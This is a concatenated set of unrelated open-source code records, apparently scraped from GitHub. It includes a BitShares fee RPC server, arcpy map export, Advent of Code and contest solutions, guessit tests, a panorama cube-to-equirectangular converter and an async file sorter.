client.get_objects(['2.0.0']))[0]\r\n fees = obj['parameters']['current_fees']['parameters']\r\n scale = float(obj['parameters']['current_fees']['scale'])\r\n for f in fees:\r\n if f[0] == 0:\r\n return (f[1], scale)\r\n raise RuntimeError('Invalid result!')\r\n\r\n async def calcul_transfer_fees(self, client, assets):\r\n ''' 计算转账费用\r\n '''\r\n fee_list = []\r\n fee, scale = await self.get_transfer_fee(client)\r\n for asset_info in assets:\r\n precision = asset_info['precision']\r\n base = asset_info['options']['core_exchange_rate']['base']\r\n quote = asset_info['options']['core_exchange_rate']['quote']\r\n\r\n total = (float(base['amount'])*(fee['fee']+fee['price_per_kbyte']))/float(quote['amount'])\r\n total = total*scale/1e4/10**precision\r\n fee_list.append(str(round(total, 2)))\r\n return fee_list\r\n\r\n async def _handle(self, request):\r\n ''' 分发请求\r\n '''\r\n request = await request.text()\r\n client = AsyncRPC(SysConfig().access, self._loop)\r\n if not await client.wait_for_ready():\r\n raise RuntimeError('Websocket connection failed')\r\n response = await methods.dispatch(request, context={'server': self, 'client': client})\r\n await client.close()\r\n if response.is_notification:\r\n return web.Response()\r\n else:\r\n return web.json_response(response, status=response.http_status)\r\n","repo_name":"zhangpanyi/btsmonitor","sub_path":"app/rpcserver.py","file_name":"rpcserver.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"34059000278","text":"#coding:utf-8\r\n'''\r\n# @Title: homework\r\n# @Description: \r\n# @author :邵鑫\r\n# @date :2019/04\r\n'''\r\nimport arcpy\r\nmymxd = \"e:/py/data/in_data/test.mxd\"\r\nmymxd1 = \"e:/py/data/in_data/test1.mxd\"\r\nmymxd2= \"e:/py/data/in_data/homework.mxd\"\r\n\r\ndef MapDocument(mymxd):\r\n '''\r\n 配置属性\r\n :param mymxd:\r\n :return:\r\n '''\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n print(mymap.title)\r\n print(mymap.summary)\r\n print(mymap.description)\r\n print(mymap.author)\r\n print(mymap.credits)\r\n print(mymap.tags)\r\n print(mymap.hyperlinkBase)\r\ndef ListLayer(mymxd):\r\n '''\r\n 图层名\r\n :param mymxd:\r\n :return:\r\n '''\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n mydfs = arcpy.mapping.ListDataFrames(mymap)\r\n for mydf in mydfs:\r\n layers = arcpy.mapping.ListLayers(mymap, \"\", mydf)\r\n layers = arcpy.mapping.ListLayers(mymap)\r\n for layer in layers:\r\n print(layer.name)\r\ndef LayerLaber(mymxd):\r\n '''\r\n 图层标注\r\n :param mymxd:\r\n :return:\r\n '''\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n layers = arcpy.mapping.ListLayers(mymap)\r\n layer = layers[0]\r\n layer.showLabels = True\r\n layer.labelClasses[0].expression = '[x坐标] + \",\"+[y坐标]'\r\n mymap.save()\r\ndef AddLayer(mymxd):\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n df = arcpy.mapping.ListDataFrames(mymap)[0]\r\n mylayer = arcpy.mapping.Layer(\"e:/py/data/clip.lyr\")\r\n arcpy.mapping.AddLayer(df, mylayer)\r\n mymap.save()\r\ndef DataRenderingOutput(mymxd):\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n layers = arcpy.mapping.ListLayers(mymap)\r\n for layer in layers:\r\n layer.showLabels = True\r\n layer.labelClasses[0].expression = '[NAME]'\r\n arcpy.RefreshTOC()\r\n arcpy.RefreshActiveView()\r\n mypdf = arcpy.mapping.PDFDocumentCreate(\"e:/data/newpdf.pdf\")\r\n lyr = arcpy.mapping.ListLayers(mymap)[4]\r\n df = arcpy.mapping.ListDataFrames(mymap)[0]\r\n rows = arcpy.SearchCursor(lyr)\r\n for row in rows:\r\n geo = row.shape\r\n 
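 calcul_transfer_fees above reduces to two multiplications and two divisions per asset. A worked instance with made-up parameters (real values come from the '2.0.0' global-parameters object and the asset's core_exchange_rate, so these figures are purely illustrative): base_amount, quote_amount = 19.0, 1000.0 # assumed core_exchange_rate of the asset fee, price_per_kbyte = 20000, 10000 # assumed raw fee parameters from object 2.0.0 scale, precision = 10000.0, 5 total = base_amount * (fee + price_per_kbyte) / quote_amount # 19 * 30000 / 1000 = 570.0 total = total * scale / 1e4 / 10 ** precision # 570.0 / 10**5 = 0.0057 print(round(total, 2)) # 0.01 once rounded 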
# df.zoomToSelectedFeatures()\r\n df.panToExtent(geo.extent)\r\n outFile = \"e://data//\" + row.getValue(\"NAME\") + \".pdf\"\r\n outFile1=outFile.replace('?', '')\r\n arcpy.mapping.ExportToPDF(mymap, outFile1)\r\n mypdf.appendPages(outFile1)\r\n mypdf.saveAndClose()\r\n mymap.save()\r\n\r\n\r\n # lyr = arcpy.mapping.ListLayers(mymap)[4]\r\n # df = arcpy.mapping.ListDataFrames(mymap)[0]\r\n # rows = arcpy.SearchCursor(lyr)\r\n # for row in rows:\r\n # geo = row.shape\r\n # df.panToExtent(geo.extent)\r\n # outFile = r\"d:\\data\\\\\" + row.getValue(\"NAME\") + \".pdf\"\r\n # arcpy.mapping.ExportToPDF(mymap, outFile)\r\n # mymap.saveAndClose()\r\n\r\n #layers = arcpy.mapping.ListLayers(mymap)\r\n # for layer in layers:\r\n # layer.showLabels = True\r\n # layer.labelClasses[0].expression = '[NAME]'\r\n # arcpy.RefreshTOC()\r\n # arcpy.RefreshActiveView()\r\n\r\nif __name__==\"__main__\":\r\n # MapDocument(mymxd)\r\n # ListLayer(mymxd)\r\n #LayerLaber(mymxd1)\r\n DataRenderingOutput(mymxd2)\r\n","repo_name":"ZzuGiser/arcpy","sub_path":"class/test_0423_mapping.py","file_name":"test_0423_mapping.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"8297314134","text":"#!/usr/bin/python3\nimport re\nimport sys\n\nlines = list(line.strip() for line in sys.stdin if line.strip())\n\nreindeers = []\nfor line in lines:\n mo = re.match(r'^(.+)? can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds\\.$', line)\n name, speed, dash, rest = mo.groups()\n reindeers.append((int(speed), int(dash), int(rest)))\n\ndef calc(time, speed, dash, rest):\n period = dash + rest\n distance = (time // period) * speed * dash\n period_rest = time % period\n distance += min(period_rest, dash) * speed\n\n return distance\n\ndef solve(time, reindeers):\n distances = [calc(time, speed, dash, rest) for (speed, dash, rest) in reindeers]\n distances.sort()\n return distances[-1]\n\ndef solve2(time, reindeers):\n points = [0 for _ in reindeers]\n for secs in range(1, time + 1):\n distances = [calc(secs, speed, dash, rest) for (speed, dash, rest) in reindeers]\n winner = max(distances)\n for i in range(len(reindeers)):\n if distances[i] == winner:\n points[i] += 1\n\n return max(points)\n\nprint(solve(2503, reindeers))\nprint(solve2(2503, reindeers))\n","repo_name":"or/adventofcode","sub_path":"14/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73921561729","text":"\"\"\"\nThis file is to display the human model into bioviz\n\"\"\"\nimport bioviz\n\n\nexport_model = True\nbackground_color = (1, 1, 1) if export_model else (0.5, 0.5, 0.5)\nshow_gravity_vector = False if export_model else True\nshow_floor = False if export_model else True\nshow_local_ref_frame = False if export_model else True\nshow_global_ref_frame = False if export_model else True\nshow_markers = False if export_model else True\nshow_mass_center = False if export_model else True\nshow_global_center_of_mass = False if export_model else True\nshow_segments_center_of_mass = False if export_model else True\n\n# model_name = \"arm26.bioMod\"\nmodel_name = \"arm26_viz.bioMod\" # this model was only used to display the results because it included more meshfiles.\nb = bioviz.Viz(\n model_name,\n show_gravity_vector=show_gravity_vector,\n show_floor=show_floor,\n show_local_ref_frame=show_local_ref_frame,\n 
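 The closed-form calc() above can be sanity-checked against the puzzle's own example: Comet flies 14 km/s for 10 s, then rests 127 s, and should be at 1120 km after 1000 s. The same arithmetic, step by step: speed, dash, rest = 14, 10, 127 period = dash + rest # 137 s per fly+rest cycle full = (1000 // period) * speed * dash # 7 whole cycles -> 980 km tail = min(1000 % period, dash) * speed # 41 s into cycle 8, all 10 flying seconds used -> 140 km print(full + tail) # 1120, matching calc(1000, 14, 10, 127) 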
show_global_ref_frame=show_global_ref_frame,\n show_markers=show_markers,\n show_mass_center=show_mass_center,\n show_global_center_of_mass=show_global_center_of_mass,\n show_segments_center_of_mass=show_segments_center_of_mass,\n mesh_opacity=1,\n background_color=background_color,\n)\nb.set_camera_position(-0.5, 3.5922578781963685, 0.1)\nb.resize(1000, 1000)\nif export_model:\n b.snapshot(\"doc/model.png\")\nb.exec()\n\nprint(\"roll\")\nprint(b.get_camera_roll())\nprint(\"zoom\")\nprint(b.get_camera_zoom())\nprint(\"position\")\nprint(b.get_camera_position())\nprint(\"get_camera_focus_point\")\nprint(b.get_camera_focus_point())","repo_name":"s2mLab/dumbbell_lifting","sub_path":"dumbbell_optimal_control/models/show_the_model.py","file_name":"show_the_model.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"1740686575","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom guessit import base_text_type, u\n\nfrom unittest import TestCase, TestLoader, TextTestRunner\nimport shlex\n\nimport yaml, logging, sys, os\nfrom os.path import *\n\n\ndef currentPath():\n '''Returns the path in which the calling file is located.'''\n return dirname(join(os.getcwd(), sys._getframe(1).f_globals['__file__']))\n\n\ndef addImportPath(path):\n '''Function that adds the specified path to the import path. The path can be\n absolute or relative to the calling file.'''\n importPath = abspath(join(currentPath(), path))\n sys.path = [importPath] + sys.path\n\nlog = logging.getLogger(__name__)\n\nfrom guessit.plugins import transformers\nimport guessit\nfrom guessit.options import option_parser\nfrom guessit import *\nfrom guessit.matcher import *\nfrom guessit.fileutils import *\n\n\ndef allTests(testClass):\n return TestLoader().loadTestsFromTestCase(testClass)\n\n\nclass TestGuessit(TestCase):\n\n def checkMinimumFieldsCorrect(self, filename, filetype=None, remove_type=True,\n exclude_files=None):\n groundTruth = yaml.load(load_file_in_same_dir(__file__, filename))\n\n def guess_func(string, options=None):\n return guess_file_info(string, options=options, type=filetype)\n\n return self.checkFields(groundTruth, guess_func, remove_type, exclude_files)\n\n def checkFields(self, groundTruth, guess_func, remove_type=True,\n exclude_files=None):\n total = 0\n exclude_files = exclude_files or []\n\n fails = {}\n additionals = {}\n\n for filename, required_fields in groundTruth.items():\n filename = u(filename)\n if filename in exclude_files:\n continue\n\n log.debug('\\n' + '-' * 120)\n log.info('Guessing information for file: %s' % filename)\n\n options = required_fields.pop('options') if 'options' in required_fields else None\n\n if options:\n args = shlex.split(options)\n options, _ = option_parser.parse_args(args)\n options = vars(options)\n found = guess_func(filename, options)\n\n total = total + 1\n\n # no need for these in the unittests\n if remove_type:\n try:\n del found['type']\n except:\n pass\n for prop in ('container', 'mimetype'):\n if prop in found:\n del found[prop]\n\n # props which are list of just 1 elem should be opened for easier writing of the tests\n for prop in ('language', 'subtitleLanguage', 'other', 'special'):\n value = found.get(prop, None)\n if isinstance(value, list) and len(value) == 1:\n found[prop] = value[0]\n\n # look for missing properties\n for prop, value in required_fields.items():\n if prop not in found:\n log.debug(\"Prop '%s' not 
found in: %s\" % (prop, filename))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s' not found in: %s\" % (prop, filename))\n continue\n\n # if both properties are strings, do a case-insensitive comparison\n if (isinstance(value, base_text_type) and\n isinstance(found[prop], base_text_type)):\n if value.lower() != found[prop].lower():\n log.debug(\"Wrong prop value [str] for '%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n\n # if both are lists, we assume list of strings and do a case-insensitive\n # comparison on their elements\n elif isinstance(value, list) and isinstance(found[prop], list):\n s1 = set(u(s).lower() for s in value)\n s2 = set(u(s).lower() for s in found[prop])\n if s1 != s2:\n log.debug(\"Wrong prop value [list] for '%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n # otherwise, just compare their values directly\n else:\n if found[prop] != value:\n log.debug(\"Wrong prop value for '%s': expected = '%s' [%s] - received = '%s' [%s]\" % (prop, u(value), type(value), u(found[prop]), type(found[prop])))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s': expected = '%s' [%s] - received = '%s' [%s]\" % (prop, u(value), type(value), u(found[prop]), type(found[prop])))\n\n # look for additional properties\n for prop, value in found.items():\n if prop not in required_fields:\n log.debug(\"Found additional info for prop = '%s': '%s'\" % (prop, u(value)))\n if not filename in additionals:\n additionals[filename] = [] \n additionals[filename].append(\"'%s': '%s'\" % (prop, u(value)))\n\n correct = total - len(fails)\n log.info('SUMMARY: Guessed correctly %d out of %d filenames' % (correct, total))\n\n for failed_entry, failed_properties in fails.items():\n log.error('---- ' + failed_entry + ' ----')\n for failed_property in failed_properties:\n log.error(\"FAILED: \" + failed_property)\n\n for additional_entry, additional_properties in additionals.items():\n log.warn('---- ' + additional_entry + ' ----')\n for additional_property in additional_properties:\n log.warn(\"ADDITIONAL: \" + additional_property)\n\n self.assertTrue(correct == total,\n msg='Correct: %d < Total: %d' % (correct, total))\n","repo_name":"lad1337/XDM","sub_path":"site-packages/guessit_new/test/guessittest.py","file_name":"guessittest.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"43"} +{"seq_id":"1695631769","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef make_order(indegree, team, n, graph):\n for i in range(n):\n for j in range(i + 1, n):\n indegree[team[j]] += 1\n graph[team[i]].append(team[j])\n\n\ndef topology_sort(indegree, graph, n):\n q = deque()\n result = []\n for i in range(1, n + 1):\n if indegree[i] == 0:\n q.append(i)\n\n cnt = 0\n while q:\n cnt += 1\n curr = q.popleft()\n result.append(curr)\n zero_indegree_exist = False\n for i in graph[curr]:\n indegree[i] -= 1\n if indegree[i] == 0:\n if zero_indegree_exist:\n return \"?\"\n q.append(i)\n zero_indegree_exist = True\n\n if cnt != n:\n return \"IMPOSSIBLE\"\n return \" 
\".join(str(i) for i in result)\n\n\nT = int(input())\nanswers = []\nfor _ in range(T):\n n = int(input())\n indegree = [0] * (n + 1)\n team = list(map(int, input().split()))\n graph = [[] for _ in range(n + 1)]\n\n make_order(indegree, team, n, graph)\n\n m = int(input())\n for _ in range(m):\n a, b = map(int, input().split())\n if a in graph[b]:\n graph[b].remove(a)\n indegree[a] -= 1\n graph[a].append(b)\n indegree[b] += 1\n else:\n graph[a].remove(b)\n indegree[b] -= 1\n graph[b].append(a)\n indegree[a] += 1\n\n answers.append(topology_sort(indegree, graph, n))\n\nfor ans in answers:\n print(ans)\n","repo_name":"Algorithm-bbackgongdan/Almut-2nd","sub_path":"code/seungwookim99/week5/boy_3665.py","file_name":"boy_3665.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"5888077380","text":"#!/usr/bin/env python3\n\nfrom typing import Dict, List, Union\n\nimport numpy as np\n\nimport torch\n\nfrom .cube2equi_numpy import run as run_numpy\nfrom .cube2equi_torch import run as run_torch\n\n__all__ = [\"Cube2Equi\", \"cube2equi\"]\n\n\nclass Cube2Equi(object):\n r\"\"\"\n params:\n - w_out, h_out (int): equirectangular image size\n - cube_format (str): input cube format(\"dice\", \"horizon\", \"dict\", \"list\")\n - sampling_method (str): defaults to \"default\"\n - mode (str): interpolation mode, defaults to \"bilinear\"\n\n inputs:\n - cubemap (np.ndarray, torch.Tensor, dict, list)\n\n returns:\n - equi (np.ndarray, torch.Tensor)\n \"\"\"\n\n def __init__(\n self,\n w_out: int,\n h_out: int,\n cube_format: str,\n sampling_method: str = \"default\",\n mode: str = \"bilinear\",\n ) -> None:\n assert w_out % 8 == 0 and h_out % 8 == 0\n self.w_out = w_out\n self.h_out = h_out\n self.cube_format = cube_format\n self.sampling_method = sampling_method\n self.mode = mode\n\n def __call__(\n self,\n cubemap: Union[\n np.ndarray,\n torch.Tensor,\n Dict[str, Union[np.ndarray, torch.Tensor]],\n List[Union[np.ndarray, torch.Tensor]],\n ],\n ) -> Union[np.ndarray, torch.Tensor]:\n return cube2equi(\n cubemap=cubemap,\n cube_format=self.cube_format,\n w_out=self.w_out,\n h_out=self.h_out,\n sampling_method=self.sampling_method,\n mode=self.mode,\n )\n\n\ndef cube2equi(\n cubemap: Union[\n np.ndarray,\n torch.Tensor,\n Dict[str, Union[np.ndarray, torch.Tensor]],\n List[Union[np.ndarray, torch.Tensor]],\n ],\n cube_format: str,\n w_out: int,\n h_out: int,\n sampling_method: str = \"default\",\n mode: str = \"bilinear\",\n) -> Union[np.ndarray, torch.Tensor]:\n r\"\"\"\n params:\n - cubemap: Union[\n np.ndarray,\n torch.Tensor,\n Dict[str, Union[np.ndarray, torch.Tensor]],\n List[Union[np.ndarray, torch.Tensor]]]\n - cube_format (str): (\"dice\", \"horizon\", \"dict\", \"list\")\n - w_out (int):\n - h_out (int):\n - sampling_method (str): \"default\"\n - mode (str): \"bilinear\"\n\n return:\n - equi (np.ndarray, torch.Tensor)\n \"\"\"\n\n # Try and detect which type it is (\"numpy\" or \"torch\")\n # FIXME: any cleaner way of detecting?\n _type = None\n if cube_format in (\"dice\", \"horizon\"):\n if isinstance(cubemap, list):\n if isinstance(cubemap[0], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n if isinstance(cubemap, np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap, torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n elif cube_format == \"dict\":\n if isinstance(cubemap, dict):\n if 
isinstance(cubemap[\"F\"], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[\"F\"], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n elif isinstance(cubemap, list):\n if isinstance(cubemap[0][\"F\"], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0][\"F\"], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n raise ValueError\n elif cube_format == \"list\":\n if isinstance(cubemap[0], list):\n if isinstance(cubemap[0][0], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0][0], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n if isinstance(cubemap[0], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n raise ValueError\n\n if _type == \"numpy\":\n return run_numpy(\n cubemap=cubemap,\n cube_format=cube_format,\n w_out=w_out,\n h_out=h_out,\n sampling_method=sampling_method,\n mode=mode,\n )\n elif _type == \"torch\":\n return run_torch(\n cubemap=cubemap,\n cube_format=cube_format,\n w_out=w_out,\n h_out=h_out,\n sampling_method=sampling_method,\n mode=mode,\n )\n else:\n raise ValueError\n","repo_name":"brstar96/HDRDatasetGenerator","sub_path":"equilib/cube2equi/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21838604626","text":"from button import Button\n\n# A child class of button which switches the text when clicking\nclass ButtonSwitch(Button):\n def __init__(self, x, y, width, height, text, color=(255, 255, 255), text_color=(0, 0, 0)):\n super().__init__(x, y, width, height, text, color, text_color)\n self.options = [\"BFS\",\"DFS\",\"WALK\",\"MAZE\"]\n \n def switch(self,screen):\n # Queue system\n temp = self.options.pop(0)\n self.options.append(temp)\n\n # Change text on screen\n self.text = f\"Type: {self.options[0]}\"\n self.draw(screen)","repo_name":"ElijahSadorra/Path-Finding","sub_path":"buttonSwitch.py","file_name":"buttonSwitch.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70532152450","text":"import pytest\nfrom json import loads\nfrom collections import Counter\nfrom bson import ObjectId\n\nimport src.database as db\nfrom src.utils import LANGUAGE_MAP\nfrom src.models import TASK_TYPES\nfrom tests.Setup import Setup\nfrom tests.utils import QUESTION_MAP\n\n\nclass TestTask(Setup):\n\n @pytest.fixture(autouse=True)\n def setUp(self, init_db, fake_user, fake_task):\n self.set_app()\n self.generate_user(fake_user)\n self.task = self.generate_task(fake_task)\n\n self.endpoint = {\n 'path': f\"/api/task/{self.task['id']}/?auth_token={self.auth_token}\"\n }\n\n def modify_task(self, task_type):\n self.task['access_type'] = task_type\n self.task['_id'] = self.task.pop('id', '')\n qns = self.task.pop('question_list', [])\n self.task['languages'] = [LANGUAGE_MAP[x] for x in self.task['languages']]\n self.task['question_count'] = dict(Counter([QUESTION_MAP[x['question_type']] for x in qns]))\n self.task['single_view_stats'] = {}\n if task_type == 'single-view':\n self.task['single_view_stats'] = {'assigned': 0, 'annotated': 0, 'unassigned': len(qns)}\n\n @pytest.mark.xfail(reason='Date formatted in backend, should be done in frontend')\n @pytest.mark.parametrize('task_type', TASK_TYPES)\n def test__get_task(self, task_type):\n task_id = ObjectId(self.task['id'])\n 
db.mongo_db.task.update_one({'_id': task_id}, {\"$set\": {'access_type': task_type}})\n self.modify_task(task_type)\n\n response = self.app.get(**self.endpoint)\n status, data = response.status_code, loads(response.data)['response']\n\n assert status == 200\n assert data == self.task\n","repo_name":"indicwiki-iiit/MCD_Backend","sub_path":"tests/functional/task/test__get_task.py","file_name":"test__get_task.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70070079489","text":"'''\nGiven an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nYou can return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nOutput: Because nums[0] + nums[1] == 9, we return [0, 1].\nExample 2:\n\nInput: nums = [3,2,4], target = 6\nOutput: [1,2]\nExample 3:\n\nInput: nums = [3,3], target = 6\nOutput: [0,1]\n \n\nConstraints:\n\n2 <= nums.length <= 105\n-109 <= nums[i] <= 109\n-109 <= target <= 109\nOnly one valid answer exists.\n'''\n#由于数据范围过大,所有不合适用散列表,选择用dict作为索引,特殊情况是没有东西\n\nclass Solution:\n def __init__(self, nums, target):\n self.nums = nums\n self.target = target\n def twoSum(self):\n My_Dict = {}\n for i in range(len(self.nums)): #遍历self.nums,优化写法2 https://www.runoob.com/python/python-func-enumerate.html\n #if(My_Dict.get(self.nums[i])):\n # print(\"%s is exists!\"%(self.nums[i]))\n #print(My_Dict.get(self.nums[i])) 没有返回值就是None\n #print(type(My_Dict.get(self.nums[i]))) \n key = self.nums[i]\n pair_key = self.target - key #寻找target匹配\n #print(\"pair_key = \"+str(pair_key))\n if(My_Dict.get(pair_key) != None):\n return [My_Dict.get(pair_key), i]\n else:\n My_Dict.update({key:i})\n print(My_Dict)\n \n return []\n \ndef twoSum(nums, target): #优化写法3\n hashmap={}\n '''\n enumerate会遍历nums,返回两个值,i是下标key,num是nums[i],\n 可以通过enumerate(nums,1)定义索引自定义所以的下标,默认是0\n '''\n for i,num in enumerate(nums):\n if hashmap.get(target - num) is not None:\n return [i,hashmap.get(target - num)]\n hashmap[num] = i #这句不能放在if语句之前,解决list中有重复值或target-num=num的情况\n\n\nif __name__ == \"__main__\":\n \n My_List = []\n target = 6\n s1 = Solution(My_List,target)\n print(s1.twoSum())\n\n","repo_name":"ycshope/python","sub_path":"algorithm/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4024539533","text":"import argparse\nimport asyncio\nimport logging\nfrom time import perf_counter\n\nfrom aiopath import AsyncPath\nimport aioshutil\n\nfrom normalization import normalize\n\n\nEXTENSIONS = {\n (\"JPEG\", \"PNG\", \"JPG\", \"SVG\"): \"images\",\n (\"AVI\", \"MP4\", \"MOV\", \"MKV\"): \"videos\",\n (\"DOC\", \"DOCX\", \"TXT\", \"PDF\", \"XLSX\", \"PPTX\"): \"documents\",\n (\"MP3\", \"OGG\", \"WAV\", \"AMR\"): \"audio\",\n (\"ZIP\", \"GZ\", \"TAR\"): \"archives\",\n \"\": 'unknown'\n}\n\nparser = argparse.ArgumentParser(description='Sorting folder')\nparser.add_argument(\"--source\", \"-s\", help=\"Source folder\", required=True)\nargs = vars(parser.parse_args())\nsource = args.get(\"source\")\n\n\nasync def file_replacement(base_path: AsyncPath, element_path: AsyncPath = None) -> None:\n \"\"\"\n Is used to replacing files from current folder according to file extension.\n :param 
base_path: given directory\n :param element_path: current directory\n :return: None\n \"\"\"\n file_name = normalize(element_path.stem)\n folder_name = EXTENSIONS.get(\n get_extensions(element_path.suffix[1:]), 'unknown'\n )\n folder_to = base_path.joinpath(folder_name)\n await folder_to.mkdir(exist_ok=True)\n\n if folder_name == 'archives':\n\n try:\n await aioshutil.unpack_archive(element_path, folder_to.joinpath(file_name))\n await element_path.unlink() # To delete archive\n except OSError as e:\n logging.error(e)\n\n else:\n file_name += element_path.suffix\n await element_path.replace(folder_to.joinpath(file_name))\n\n\ndef get_extensions(extension: str) -> tuple:\n \"\"\"\n Is used to get tuple keys using one extension. \\n\n :param extension: is file extensions\n \"\"\"\n for key in EXTENSIONS:\n if extension.upper() in key:\n return key\n\n\nasync def get_folders(base_path: AsyncPath, current_path: AsyncPath = None) -> None:\n \"\"\"\n Is used to get all folders which must be traversed. \\n\n :param base_path: base directory\n :param current_path: current directory\n :return: None\n \"\"\"\n if current_path is None:\n current_path = base_path\n folders.append(current_path)\n\n async for element in current_path.iterdir():\n\n if await element.is_dir() and element not in EXTENSIONS.values():\n folders.append(element)\n await get_folders(base_path=base_path, current_path=element)\n\n\nasync def iterfolder(base_path: AsyncPath, current_path: AsyncPath) -> None:\n \"\"\"\n Is used to traverse directory. \\n\n :param base_path: base directory\n :param current_path: current directory path\n :return: None\n \"\"\"\n start_time = perf_counter() # For time measuring\n logging.debug(f\"started with args: {current_path}\")\n\n async for element in current_path.iterdir():\n\n if await element.is_file():\n await file_replacement(base_path=base_path, element_path=element)\n\n logging.debug(f'done with args: {current_path} in {perf_counter() - start_time}')\n\n\nasync def main() -> None:\n \"\"\"\n Main loop function. 
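 get_extensions above does a reverse lookup from a single suffix to the tuple key it belongs to, and file_replacement then maps that key through EXTENSIONS. The round trip on two concrete suffixes: key = get_extensions("mp3") # ("MP3", "OGG", "WAV", "AMR") print(EXTENSIONS.get(key, "unknown")) # audio # an unknown suffix matches no tuple, get_extensions returns None, # and the .get(..., 'unknown') fallback in file_replacement kicks in: print(EXTENSIONS.get(get_extensions("xyz"), "unknown")) # unknown 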
\\n\n :return: None\n \"\"\"\n base_path = AsyncPath(source)\n\n logging.info('Getting folders...')\n await get_folders(base_path)\n logging.info('Folders got.')\n\n logging.info(f'Sorting {base_path} ...')\n tasks = [iterfolder(base_path=base_path, current_path=folder) for folder in folders]\n await asyncio.gather(*tasks)\n\n logging.info('Removing empty folders...')\n await remove_empty_folders(base_path)\n logging.info('Empty folders removed.')\n\n\nasync def remove_empty_folders(base_path: AsyncPath) -> None:\n \"\"\"\n Is used to remove all empty folders\n :param base_path: given directory\n :return: None\n \"\"\"\n async for element in base_path.iterdir():\n if element.name not in EXTENSIONS.values() and await element.is_dir():\n await aioshutil.rmtree(element)\n\n\nif __name__ == '__main__':\n\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s [%(levelname)s] %(funcName)s %(message)s',\n )\n\n folders = []\n start_time = perf_counter()\n asyncio.run(main())\n logging.info(f\"Sorted done in {perf_counter() - start_time}sec\")\n","repo_name":"Vaipik/GoIT-PyWeb7","sub_path":"hw6/gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7803174546","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nfrom scipy.spatial import cKDTree\nimport numpy as np\n\n\ndef compute_n(points,interf_points,region_index):\n \n normale=np.zeros([len(points),3])\n \n normale[:,:] = points[:,:] - interf_points[:,:][region_index]\n norm = np.sqrt(np.sum(normale[:,:]**2 , axis=1))\n normale /= norm[:,np.newaxis]\n \n return normale\n \n \ndef calculate_orthogonal_vectors(v): #calculer les deux vecteurs orthonormaux à un vecteur v\n \n # Générer un vecteur aléatoire de même dimension que v\n random_vector = np.random.randn(len(v))\n \n # Calculer le produit vectoriel entre v et le vecteur aléatoire\n cross_product = np.cross(v, random_vector)\n \n # Calculer le produit vectoriel entre v et le produit vectoriel précédent\n orthogonal_vector = np.cross(v, cross_product)\n \n # Normaliser les vecteurs\n cross_product_normalized = cross_product / np.linalg.norm(cross_product)\n orthogonal_vector_normalized = orthogonal_vector / np.linalg.norm(orthogonal_vector)\n \n return cross_product_normalized, orthogonal_vector_normalized\n \n 